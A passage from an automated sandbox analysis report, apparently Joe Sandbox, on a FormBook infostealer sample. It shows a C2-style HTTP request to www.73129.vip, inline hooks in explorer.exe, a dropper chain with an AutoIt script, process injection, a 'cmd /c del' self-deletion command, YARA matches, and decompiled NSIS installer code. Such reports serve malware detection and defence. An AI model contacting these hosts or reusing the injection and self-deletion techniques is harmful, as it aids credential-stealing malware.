Nov 29, 2022 15:13:51.421838045 CET	105	OUT	GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1 Host: www.73129.vip Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 29, 2022 15:13:51.719268084 CET	105	IN	HTTP/1.1 302 Found Server: nginx Date: Tue, 29 Nov 2022 14:13:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: http://gcsahrz23.xyz/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE7
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE7
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE7
GetMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE7

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: shedfam.exePID: 2620, Parent PID: 3452

General

Target ID:	0
Start time:	15:12:02
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\shedfam.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\shedfam.exe
Imagebase:	0x400000
File size:	901270 bytes
MD5 hash:	C0A85D86855B257B25572AA7D9D90381
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: kmhbvf.exePID: 4820, Parent PID: 2620

General

Target ID:	1
Start time:	15:12:03
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Local\Temp\kmhbvf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Imagebase:	0xed0000
File size:	893608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 2%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: kmhbvf.exePID: 5280, Parent PID: 4820

General

Target ID:	2
Start time:	15:12:03
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Local\Temp\kmhbvf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Imagebase:	0xed0000
File size:	893608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 5280

General

Target ID:	3
Start time:	15:12:09
Start date:	29/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: NETSTAT.EXEPID: 2304, Parent PID: 3452

General

Target ID:	13
Start time:	15:12:51
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0x120000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5488, Parent PID: 2304

General

Target ID:	14
Start time:	15:12:59
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5260, Parent PID: 5488

General

Target ID:	15
Start time:	15:12:59
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: shedfam.exePID: 2620, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.9%
Total number of Nodes:	1272
Total number of Limit Nodes:	22

Executed Functions

Function 0040324F Relevance: 84.3, APIs: 26, Strings: 22, Instructions: 313
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			_entry_() {
				intOrPtr _t40;
				CHAR* _t44;
				char* _t47;
				signed int _t49;
				void* _t53;
				intOrPtr _t55;
				int _t56;
				signed int _t59;
				signed int _t60;
				int _t61;
				signed int _t63;
				signed int _t66;
				int _t83;
				void* _t87;
				void* _t99;
				intOrPtr* _t100;
				void* _t103;
				CHAR* _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t113;
				signed int _t115;
				char* _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				char _t138;

				 *(_t121 + 0x1c) = 0;
				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				_t110 = 0;
				 *(_t121 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t100 = E00406087(0);
					if(_t100 != 0) {
						 *_t100(0xc00);
					}
				}
				E0040601D("UXTHEME"); // executed
				E0040601D("USERENV"); // executed
				E0040601D("SETUPAPI"); // executed
				E00406087(0xd);
				_t40 = E00406087(0xb);
				 *0x423f84 = _t40;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x424038 = _t40;
				SHGetFileInfoA(0x41f538, 0, _t121 + 0x34, 0x160, 0); // executed
				E00405CFB(0x423780, "NSIS Error");
				_t44 = GetCommandLineA();
				_t117 = "\"C:\\Users\\hardz\\Desktop\\shedfam.exe\"";
				E00405CFB(_t117, _t44);
				 *0x423f80 = GetModuleHandleA(0);
				_t47 = _t117;
				if("\"C:\\Users\\hardz\\Desktop\\shedfam.exe\"" == 0x22) {
					 *((char*)(_t121 + 0x14)) = 0x22;
					_t47 =  &M0042A001;
				}
				_t49 = CharNextA(E00405819(_t47,  *((intOrPtr*)(_t121 + 0x14))));
				 *(_t121 + 0x1c) = _t49;
				while(1) {
					_t103 =  *_t49;
					_t125 = _t103;
					if(_t103 == 0) {
						break;
					}
					__eflags = _t103 - 0x20;
					if(_t103 != 0x20) {
						L8:
						__eflags =  *_t49 - 0x22;
						 *((char*)(_t121 + 0x14)) = 0x20;
						if( *_t49 == 0x22) {
							_t49 = _t49 + 1;
							__eflags = _t49;
							 *((char*)(_t121 + 0x14)) = 0x22;
						}
						__eflags =  *_t49 - 0x2f;
						if( *_t49 != 0x2f) {
							L18:
							_t49 = E00405819(_t49,  *((intOrPtr*)(_t121 + 0x14)));
							__eflags =  *_t49 - 0x22;
							if(__eflags == 0) {
								_t49 = _t49 + 1;
								__eflags = _t49;
							}
							continue;
						} else {
							_t49 = _t49 + 1;
							__eflags =  *_t49 - 0x53;
							if( *_t49 == 0x53) {
								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000002;
									__eflags = _t110;
								}
							}
							__eflags =  *_t49 - 0x4352434e;
							if( *_t49 == 0x4352434e) {
								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000004;
									__eflags = _t110;
								}
							}
							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t49 - 2)) = 0;
								__eflags = _t49 + 2;
								E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t49 + 2);
								L23:
								_t108 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t108); // executed
								_t53 = E0040321E(_t125);
								_t126 = _t53;
								if(_t53 != 0) {
									L25:
									DeleteFileA("1033"); // executed
									_t55 = E00402C88(_t127, _t110); // executed
									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
									if(_t55 != 0) {
										L35:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										_t134 =  *((intOrPtr*)(_t121 + 0x10));
										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
											__eflags =  *0x424014;
											if( *0x424014 == 0) {
												L62:
												_t56 =  *0x42402c;
												__eflags = _t56 - 0xffffffff;
												if(_t56 != 0xffffffff) {
													 *(_t121 + 0x18) = _t56;
												}
												ExitProcess( *(_t121 + 0x18));
											}
											_t118 = E00406087(5);
											_t111 = E00406087(6);
											_t59 = E00406087(7);
											__eflags = _t118;
											_t109 = _t59;
											if(_t118 != 0) {
												__eflags = _t111;
												if(_t111 != 0) {
													__eflags = _t109;
													if(_t109 != 0) {
														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
														__eflags = _t66;
														if(_t66 != 0) {
															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
															 *(_t121 + 0x38) = 1;
															 *(_t121 + 0x44) = 2;
															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
														}
													}
												}
											}
											_t60 = E00406087(8);
											__eflags = _t60;
											if(_t60 == 0) {
												L60:
												_t61 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t61;
												if(_t61 != 0) {
													goto L62;
												}
												goto L61;
											} else {
												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t63;
												if(_t63 == 0) {
													L61:
													E0040140B(9);
													goto L62;
												}
												goto L60;
											}
										}
										E004055BC( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x423f9c == 0) {
										L34:
										 *0x42402c =  *0x42402c | 0xffffffff;
										 *(_t121 + 0x18) = E0040374E( *0x42402c);
										goto L35;
									}
									_t115 = E00405819(_t117, 0);
									while(_t115 >= _t117) {
										__eflags =  *_t115 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t115 = _t115 - 1;
										__eflags = _t115;
									}
									_t131 = _t115 - _t117;
									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
									if(_t115 < _t117) {
										_t113 = E00405543(_t134);
										lstrcatA(_t108, "~nsu");
										if(_t113 != 0) {
											lstrcatA(_t108, "A");
										}
										lstrcatA(_t108, ".tmp");
										_t119 = "C:\\Users\\hardz\\Desktop";
										if(lstrcmpiA(_t108, "C:\\Users\\hardz\\Desktop") != 0) {
											_push(_t108);
											if(_t113 == 0) {
												E00405526();
											} else {
												E004054A9();
											}
											SetCurrentDirectoryA(_t108);
											_t138 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
											if(_t138 == 0) {
												E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t119);
											}
											E00405CFB(0x425000,  *(_t121 + 0x1c));
											 *0x425400 = 0x41;
											_t120 = 0x1a;
											do {
												E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x120)));
												DeleteFileA(0x41f138);
												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
													_t83 = CopyFileA("C:\\Users\\hardz\\Desktop\\shedfam.exe", 0x41f138, 1);
													_t140 = _t83;
													if(_t83 != 0) {
														_push(0);
														_push(0x41f138);
														E00405A49(_t140);
														E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x124)));
														_t87 = E0040555B(0x41f138);
														if(_t87 != 0) {
															CloseHandle(_t87);
															 *((intOrPtr*)(_t121 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t120 = _t120 - 1;
												_t142 = _t120;
											} while (_t120 != 0);
											_push(0);
											_push(_t108);
											E00405A49(_t142);
										}
										goto L35;
									}
									 *_t115 = 0;
									_t116 = _t115 + 4;
									if(E004058CF(_t131, _t115 + 4) == 0) {
										goto L35;
									}
									E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t116);
									E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t116);
									 *((intOrPtr*)(_t121 + 0x10)) = 0;
									goto L34;
								}
								GetWindowsDirectoryA(_t108, 0x3fb);
								lstrcatA(_t108, "\\Temp");
								_t99 = E0040321E(_t126);
								_t127 = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								goto L25;
							} else {
								goto L18;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t49 = _t49 + 1;
						__eflags =  *_t49 - 0x20;
					} while ( *_t49 == 0x20);
					goto L8;
				}
				goto L23;
			}

0x00403260
0x00403264
0x0040326c
0x0040326e
0x00403273
0x00403283
0x00403286
0x0040328d
0x00403294
0x00403294
0x0040328d
0x0040329b
0x004032a5
0x004032af
0x004032b6
0x004032bd
0x004032c2
0x004032c7
0x004032ce
0x004032d4
0x004032ea
0x004032fa
0x004032ff
0x00403305
0x0040330c
0x0040331f
0x00403324
0x00403326
0x00403328
0x0040332d
0x0040332d
0x0040333d
0x00403343
0x004033ac
0x004033ac
0x004033ae
0x004033b0
0x00000000
0x00000000
0x00403349
0x0040334c
0x00403354
0x00403354
0x00403357
0x0040335c
0x0040335e
0x0040335e
0x0040335f
0x0040335f
0x00403364
0x00403367
0x0040339c
0x004033a1
0x004033a6
0x004033a9
0x004033ab
0x004033ab
0x004033ab
0x00000000
0x00403369
0x00403369
0x0040336a
0x0040336d
0x00403375
0x00403378
0x0040337a
0x0040337a
0x0040337a
0x00403378
0x0040337d
0x00403383
0x0040338b
0x0040338e
0x00403390
0x00403390
0x00403390
0x0040338e
0x00403393
0x0040339a
0x004033b4
0x004033b7
0x004033c0
0x004033c5
0x004033c5
0x004033d0
0x004033d6
0x004033db
0x004033dd
0x004033ff
0x00403404
0x0040340b
0x00403412
0x00403416
0x0040347d
0x0040347d
0x00403482
0x00403488
0x0040348c
0x004035a1
0x004035a7
0x00403644
0x00403644
0x00403649
0x0040364c
0x0040364e
0x0040364e
0x00403656
0x00403656
0x004035b6
0x004035bf
0x004035c1
0x004035c6
0x004035c8
0x004035ca
0x004035cc
0x004035ce
0x004035d0
0x004035d2
0x004035e2
0x004035e4
0x004035e6
0x004035f3
0x00403602
0x0040360a
0x00403612
0x00403612
0x004035e6
0x004035d2
0x004035ce
0x00403616
0x0040361b
0x00403622
0x00403630
0x00403633
0x00403639
0x0040363b
0x00000000
0x00000000
0x00000000
0x00403624
0x0040362a
0x0040362c
0x0040362e
0x0040363d
0x0040363f
0x00000000
0x0040363f
0x00000000
0x0040362e
0x00403622
0x0040349b
0x004034a2
0x004034a2
0x0040341e
0x0040346d
0x0040346d
0x00403479
0x00000000
0x00403479
0x00403427
0x00403434
0x0040342b
0x00403431
0x00000000
0x00000000
0x00403433
0x00403433
0x00403433
0x00403438
0x0040343a
0x00403442
0x004034b3
0x004034b5
0x004034bc
0x004034c4
0x004034c4
0x004034cf
0x004034d4
0x004034e3
0x004034e7
0x004034e8
0x004034f1
0x004034ea
0x004034ea
0x004034ea
0x004034f7
0x004034fd
0x00403503
0x0040350b
0x0040350b
0x00403519
0x00403520
0x00403529
0x0040352f
0x0040353b
0x00403541
0x0040354b
0x00403555
0x0040355b
0x0040355d
0x0040355f
0x00403560
0x00403561
0x00403572
0x00403578
0x0040357f
0x00403582
0x00403588
0x00403588
0x0040357f
0x0040355d
0x0040358c
0x00403592
0x00403592
0x00403592
0x00403595
0x00403596
0x00403597
0x00403597
0x00000000
0x004034e3
0x00403444
0x00403446
0x00403451
0x00000000
0x00000000
0x00403459
0x00403464
0x00403469
0x00000000
0x00403469
0x004033e5
0x004033f1
0x004033f6
0x004033fb
0x004033fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040339a
0x00000000
0x00000000
0x00000000
0x0040334e
0x0040334e
0x0040334e
0x0040334f
0x0040334f
0x00000000
0x0040334e
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403273
GetVersion.KERNEL32 ref: 00403279
#17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 004032C7
OleInitialize.OLE32(00000000), ref: 004032CE
SHGetFileInfoA.SHELL32(0041F538,00000000,?,00000160,00000000), ref: 004032EA
GetCommandLineA.KERNEL32(00423780,NSIS Error), ref: 004032FF
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\shedfam.exe",00000000), ref: 00403312
CharNextA.USER32(00000000,"C:\Users\user\Desktop\shedfam.exe",00409130), ref: 0040333D
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033D0
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033E5
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F1
DeleteFileA.KERNELBASE(1033), ref: 00403404

Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4

ExitProcess.KERNEL32(00000000), ref: 0040347D
OleUninitialize.OLE32(00000000), ref: 00403482
ExitProcess.KERNEL32 ref: 004034A2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\shedfam.exe",00000000,00000000), ref: 004034B5
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\shedfam.exe",00000000,00000000), ref: 004034C4
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\shedfam.exe",00000000,00000000), ref: 004034CF
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\shedfam.exe",00000000,00000000), ref: 004034DB
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004034F7
DeleteFileA.KERNEL32(0041F138,0041F138,?,00425000,?), ref: 00403541
CopyFileA.KERNEL32(C:\Users\user\Desktop\shedfam.exe,0041F138,00000001), ref: 00403555
CloseHandle.KERNEL32(00000000,0041F138,0041F138,?,0041F138,00000000), ref: 00403582
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004035DB
ExitWindowsEx.USER32 ref: 00403633
ExitProcess.KERNEL32 ref: 00403656

Strings

, xrefs: 0040326E
", xrefs: 0040335F
_?=, xrefs: 0040342B
"C:\Users\user\Desktop\shedfam.exe", xrefs: 00403305, 0040330B, 00403421
Error launching installer, xrefs: 0040343A
UXTHEME, xrefs: 00403296
\Temp, xrefs: 004033EB
SeShutdownPrivilege, xrefs: 004035ED
.tmp, xrefs: 004034C9
C:\Users\user\AppData\Local\Temp\, xrefs: 004033C5, 004033CA, 004033E4, 004033F0, 004034B2, 004034C3, 004034CE, 004034DA, 004034E7, 004034F6, 00403596
NCRC, xrefs: 0040337D
USERENV, xrefs: 004032A0
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403264
C:\Users\user\AppData\Local\Temp, xrefs: 004033BB, 00403454, 004034FD, 00403506
1033, xrefs: 004033FF
SETUPAPI, xrefs: 004032AA
C:\Users\user\Desktop, xrefs: 004034D4, 004034D9, 00403505
~nsu, xrefs: 004034AD
C:\Users\user\Desktop\shedfam.exe, xrefs: 00403550
/D=, xrefs: 00403393
NSIS Error, xrefs: 004032F0
C:\Users\user\AppData\Local\Temp, xrefs: 0040345F

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\shedfam.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\shedfam.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
API String ID: 2193684524-2617628145
Opcode ID: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
Instruction ID: fae095d870e6aa7b2133663338cad99947a58f50826f320776521e81424d7011
Opcode Fuzzy Hash: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
Instruction Fuzzy Hash: 19A1D370A083417AE7217F619C4AB2B7EAC9B4170AF54053FF881761D2CB7C9E058A6F

Uniqueness

Uniqueness Score: -1.00%

Function 00405620 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

